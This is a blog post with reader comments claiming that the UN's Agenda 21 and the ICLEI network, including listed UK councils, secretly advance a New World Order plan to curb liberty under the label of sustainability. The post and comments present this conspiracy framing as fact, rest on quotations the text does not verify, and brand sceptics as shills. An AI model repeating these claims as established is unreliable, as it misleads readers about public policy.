Agenda 21

Courtesy of Ian Parker-Joseph this article was brought to my attention, one which was posted on Christmas Eve last year, from which:

“The philosophy behind Agenda 21 is that our environmental problems are the number one problem that we are facing, and that those problems are being caused by human activity.  Therefore, according to Agenda 21 human activity needs to be tightly monitored, regulated and controlled for the greater good.  Individual liberties and freedoms must be sacrificed for the good of the planet.”

Continuing that sadly, the principles behind Agenda 21 are being rammed down the throats of local communities all over America, and most of the people living in those communities don’t even realize it, the author writes:

“….after Agenda 21 was adopted, an international organization known as the “International Council for Local Environmental Initiatives” (ICLEI) was established to help implement the goals of Agenda 21 in local communities.”

Interesting body is the International Council for Local Environment Initiatives (ICLEI) who number among their membership the following in the UK:

  • Aberdeen
  • Birmingham City Council
  • Bristol City Council
  • City of Glasgow
  • Craigavon Borough Council
  • Greater London Authority
  • Knowsley Metropolitan Borough Council
  • Newcastle City Council
  • Royal Haskoning (Associate Member)
  • Woking Borough Council

to which list can be added the London Borough of Hammersmith & Fulham, Harrow. along with South Wiltshire as further examples.

I am aware that there have been articles about Agenda 21 and the New World Order, notably by CallingEngland for example, however methinks it is about time this intriguing subject saw the light of day once again; especially from the local aspect and links to Common Purpose. More to follow in the days and weeks ahead.

Environmental problems are, or can be very very serious indeed, & need careful consideration & control.
This is precisely, 150% how NOT to do it.
I get the suspicion that “agenda21” are using this as a stalking-horse for something much nastier.
    Really, really not wanted!

David, this from American Thinker touches on it here:

A detailed history on sustainable development, definitions, and critical actions can be found here.

Section III of the Agenda 21 Plan addresses local community sustainable development. The Preamble

    and Chapter 28

discuss how Agenda 21 should be implemented at a local level. The United Nations purposely recommends avoiding the term Agenda 21 and suggests a cleverly named alternative: “smart growth.” The United Nations Millennium Papers – Issue 2(page 5)

says this of Agenda 21 and smart growth:

Participating in a UN-advocated planning process would very likely bring out many of the conspiracy-fixated groups and individuals in our society such as the National Rifle Association, citizen militias and some members of Congress. This segment of our society who fear ‘one-world government’ and a UN invasion of the United States through which our individual freedom would be stripped away would actively work to defeat any elected official who joined ‘the conspiracy’ by undertaking LA21. So, we call our process something else, such as comprehensive planning, growth management, or smart growth.

the new godless, dumb, non critically thinking, state-educated child of the C21st, so beloved of Them:

Education is a key ingredient in the transformation to a sustainable society. The UN Commission on Sustainable Development reports that in America, “the national strategy on education is prepared by the Department of Education and includes such programmes as Goals 2000 and School to Work” (emphasis added).

The National Environmental Education Advisory Council to the Department of Education consists of eleven individuals appointed by the EPA Administrator and includes representatives of women, NGOs, and local authorities (visioning councils). The U.S. State Department reported to the UN that:

“At the primary school level, school curricula have already been reviewed and revised, and at the secondary school level, the revision of school curricula is being undertaken currently to address environment and development as a cross cutting issue.”

I look forward to your series, David as this is one of the backdoor ways the PTB are encroaching on freedoms in the guise of sustainability.

To readers still stuck in this “religious nut”, “NWO nut”, “conspiracy loon” rhetoric we saw some of last evening in comments, it puts those people into one of two boats:

    1. trolls and shills
    2. good people who simply don’t want to know and can dismiss anything, even backed by evidence like this, as “loonery”.

One can’t have a rational discussion with someone who dismisses everything as loonery or moonbattery without even considering the data properly.

Within our own ranks are plenty of shills and trolls too and they give serious study a bad name. That the UN is doing this is obvious now we read the quotes. However, if you, David, had not introduced this topic, most people would not be aware of it in any detail and consequently would not think about it and what the overall purpose is.

And the overall purpose is in the first quote at the top of your post.

Nothing at all wrong with “tread lightly”
However, leaving aside the other extreme: – deliberate pollution for material gain – which is just another form of theft, then agenda21 seem to be a very suspicious group with an unpleasant agenda.
    NOT to be trusted.
